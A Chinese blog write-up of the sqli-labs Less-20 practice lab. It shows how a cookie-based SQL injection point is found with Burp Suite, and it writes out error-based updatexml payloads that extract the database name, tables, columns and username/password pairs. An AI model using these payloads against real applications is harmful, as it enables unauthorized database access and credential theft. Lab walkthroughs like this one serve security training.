sqli-labs Less-20 POST-Cookie injections-uagent field-error based

最新推荐文章于 2022-12-27 15:17:59 发布
最新推荐文章于 2022-12-27 15:17:59 发布
阅读量158 收藏
点赞数
分类专栏: 数据库 SQL注入 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bigblue00/article/details/108996908
版权

POST方式,基于报错的cookie注入
1、页面分析
登陆成功后,页面会显示cookie信息,判断为登陆成功后,在cookie处存在注入点。
在这里插入图片描述

2、注入点分析
用burpsuit 拦截,放行2次后,cookie处出现uname信息
在这里插入图片描述

将报文发送到repeater后,在uname=admin处加上单引号,send后返回报错信息
在这里插入图片描述
在这里插入图片描述

可判断此处存在注入点。

3、获取数据库信息

3.1获取数据库名

’ or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)#
在这里插入图片描述

3.2获取表名
’ or updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)#
在这里插入图片描述

3.3 获取表的字段

’ or updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_name=‘users’ limit 4,1),0x7e),1)#
在这里插入图片描述

’ or updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_name=‘users’ limit 5,1),0x7e),1)#
在这里插入图片描述

3.4 获取username, password数据
’ or updatexml(1,concat(0x7e,(SELECT concat(username,’|’,password) from users limit 4,1),0x7e),1)#

在这里插入图片描述

远行01
关注
专栏目录
sqli-labs less 18 POST- Header injections - Uagent field -error based
Monster1m的博客
01-25 216
一、这关提示头部注入。先来看一下源码 1.又出现了check_input函数,说明又开始进行了输入的过滤,先来找找哪些变量用到了这个函数 2.这里发现uname和passwd都进行了过滤,所以不能作为注入点,需要找其他没有被过滤的注入点 3.$_SERVER是一个包含了头信息、路径等的数组,这里直接赋值了agent没有对数据进行检查,下一步就是要找到有没有数据库语句用到这个uagent变量 4.发现这里的插入语句用到了uagent,可以确定在此注入,并且是用单引号闭合 5.这里有有输出数据库错误信息
js操作数据库实现注册和登陆的简单实例
10-22
下面小编就为大家带来一篇js操作数据库实现注册和登陆的简单实例。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
sqli-labs】 less20 POST - Cookie injections - Uagent field - Error based (POST型基于错误的cookie头部注入)...
ajxi63204的博客
01-26 220
以admin admin成功登陆之后,保存并显示了cookies信息 如果不点击Delete Your Cookie!按钮,那么访问 http://localhost/sqli-labs-master/Less-20/ 就不需要再次登陆了,通过cookies获取了username并且没有进行验证 通过浏览器插件EditThisCookie来修改 加单引号...
sqli-labs less 20 POST-Cookie injections -Uagent field -error based
Monster1m的博客
01-26 150
一、这关提示用cookie注入,先来看一下源码 1.依然还是对uname和passwd使用了check_input函数进行了过滤,所以另寻注入点 2.这里看到直接获取了cookie的值没有进行检查过滤,所以继续找有使用到$cookee这个变量的数据库语句 3.这里的select查询用到了cookee这个变量,确定了注入点,并且是用单引号进行了闭合 4.这里也有输出数据库错误信息,所以可以使用报错注入 二、打开bp拦截,因为需要抓cookie,所以需要登录账号,这里用户名密码都用admin 1.输入a
jsp访问mysql数据库实现注册登录功能
热门推荐
仲夏的博客
01-25 1万+
上次用jdbc在java控制台实现了用户登录注册功能,最近在学习Javaweb,有了一些jsp基础,正好写一篇jsp访问MySQL数据库实现网页简易用户注册登录功能。 首先将新建的Web项目添加到Tomcat中 接下来导包 将mysql jar包粘贴到lib目录下 接下来开始写简易注册界面(zhuce.jsp) <%@ page language="java" conte...
node mysql实现登陆注册_Node.js+Express+MySql实现用户登录注册功能
weixin_33479446的博客
02-19 385
本文实例为大家分享了Node.js实现用户登录注册的具体代码,供大家参考,具体内容如下IDE:WebStorm工程目录:数据库表Login.js:/*** Created by linziyu on 2017/7/8.*//*** express接收html传递的参数*/var express=require('express');var app=express();var m...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
完整的php+mysql+js用户注册与登陆
06-29
自己写了一个比较完整的用户注册与登陆系统,包内包含数据库建库语句。适合大家进行二次开发
利用html、css、javascript、php同时交互数据库制作的注册登录界面
08-10
简单的注册登录界面,在代码中有详细的解释,具体可参考我的博客
使用JS写服务器端连接数据库的代码示例
03-24
使用JS写服务器端连接数据库的代码示例,使用JS写服务器端连接数据库的代码示例
用html和mysql实现登陆和注册,Node.js+Express+MySql实现用户登录注册
weixin_36178269的博客
06-15 693
IDE:WebStormLogin.js:/*** Created by linziyu on 2017/7/8.*//*** express接收html传递的参数*/var express=require('express');var app=express();var mysql=require('mysql');/*** 配置MySql*/var connection = mysql.c...
node.js+mysql实现简单登录注册
zby833的博客
12-27 1732
node mysql 登录 注册 初学
mysql登录判断javascript_js操作数据库实现注册和登陆的简单实例
weixin_39911056的博客
01-19 377
自从node-js出现之后,不只是java,php等后端语言可以操作数据库,进行内容的增删改查,javascript简本语言同样具备了该项技能,而且在node下,js具备了很强的操作性和代码的阅读性,让晦涩难懂的代码变得更加的清晰了,下面我简单介绍javascript如何操作数据库进行登录注册功能的实现。首先,页面部分就直接省略了,我们默认已经安装数据库了,开始从注登录说起。exports.log...
mysql js 命令行登录_命令行操作
weixin_33514475的博客
02-07 467
一:安装nodejs官网下载msi格式(microsoft installer的简称)的安装包安装即可。装了nodejs后就可以用npm命令了。window安装cnpm:npm i -g cnpm --registry=https://registry.npm.taobao.org二:linux命令安装nodejs或者cnpm时,因为是全局安装的,要用到root权限,所以要用sodu命令。只要能查...
PHP+MySQL+JavaScript实现用户注册系统
Elo的博客
07-18 2313
以下是用户注册界面: 其中,检查用户名用来检查是否该用户名已被注册 点击检查用户名将弹出窗口提示是否已被注册 未被注册时要弹出的界面: 用户名已被注册时弹出的界面: 各个属性在MySQL中的类型   基本思路就是在这个表单中将填写的内容传到JavaScript, 然后JavaScript中使用window.open()函数调用php文件检验用户名是否已被注册. 代码...
在js里用mysql实现登录界面_js实现登录与注册界面
weixin_39761647的博客
01-20 1143
完成登录与注册页面的HTML+CSS+JS,其中的输入项检查包括:用户名6-12位首字母不能是数字只能包含字母和数字密码6-12位注册页两次密码是否一致html代码:欢迎你,请先登陆!登陆登陆&nbsp&nbsp&nbsp&nbspcss代码:*{margin: 0;padding: 0;font-family: 微软雅黑;font-size: 12px;}.box...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值